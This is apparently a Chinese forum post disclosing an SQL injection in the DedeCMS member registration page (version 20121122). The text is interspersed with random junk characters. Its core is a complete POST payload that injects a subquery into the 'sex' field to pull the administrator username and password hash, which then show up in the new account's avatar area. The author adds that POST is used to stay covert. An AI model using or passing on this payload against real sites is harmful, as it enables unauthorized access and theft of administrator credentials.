dedecms版本 20121122% b s2 i* I1 ^2 d2 Y! \
$ A& Z/ ~7 |" J5 w& ]; e* T$ k! n需要magic_quotes_gpc=Off' N! C$ A/ ^: i* C4 L3 L1 A$ Y5 t7 D
I' ]' _. l4 F- n
应该是没有什么大危害的漏洞.& S1 C8 v( Y: Y/ ~/ S" Q' u
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.4 A, z3 i* P# v* A J
& m2 b) g- C3 ]- V+ V% c; d是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.. s" n& Z2 u; q2 _( c @$ W5 G- C
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
1 _$ y5 ^4 p' b0 ^% T0 G Q5 R8 g& h
http:///de/member/reg_new.php I# Z7 u% r S" ~9 |* ~$ i! H2 K
2 W# S1 c' n! f0 v8 M' O$ b9 [2 ?POST; @+ X; v* e% m. D" J
4 C: u# C" N0 P! p# Ldopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
( B- |5 B0 H8 F1 w+ Z* x0 X, U( s4 ?/ `1 p4 B5 v' X+ Z3 G
成功注册后,头像处里面有好玩的信息.+ T* u2 h# l1 S- \5 T0 L
' A0 R& ~# r: ^; g; M* Z |